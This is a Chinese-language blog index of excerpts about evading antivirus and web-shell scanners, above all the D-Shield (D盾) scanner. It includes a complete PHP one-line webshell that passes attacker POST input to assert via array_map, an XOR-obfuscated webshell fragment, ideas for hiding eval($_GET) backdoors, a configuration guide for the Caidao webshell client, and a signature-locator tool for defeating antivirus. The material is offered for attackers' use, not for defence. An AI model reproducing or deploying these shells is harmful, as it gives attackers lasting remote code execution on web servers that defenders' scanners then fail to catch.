异或免杀D盾PHP一句话
之前给的过D盾一句话webshell现在都已被查杀,补个 <?php header('HTTP/1.1 404'); class ZXVG { public $c=''; public function __destruct() { $_0='&'^"\x47"; $_1='C'^"\x30"; $_2='A'^"\x32"; $...
再丢个过D盾免杀PHP一句话木马
前几天给的那个已经进套餐,今天再扔个免杀过D盾的 <?php function today($a, $b) { array_map($a, $b); } today(assert, array($_POST['x'])); ?>
过D盾Shell新思路分析
在先知上看到了一个shell过D盾的思路,同样可用来过其它waf。 D盾扫描结果 以前的思路常规,就是定义一个变量b:$b='';为空,$b = null;,$b = "\n";然后变量a: $a = $_GET['1'];,eval($a.$b);...
caidao.conf参数表,菜刀配置详解
- 2016-08-11
- 免杀
新版菜刀更新了后,配置项增加了更多可自定义值,现在它更锋利了,就和以前的鸽子一样,配置文件免杀后,可能你的SHELL就过了! <FLAG> 返回的内容分隔...
VirTest5.0特征码定位器(开源)
- 2014-08-16
- 免杀
以前向无花果大婶要的一份源代码,未经过他老人家的允许,特此斗胆献给大家。 目前比较常有名气的特征码定位器主要有CCL与MYCCL,他们都采用文件分块定位的办法,定位效果带有运气成份,且可能每次定位出的位置都...
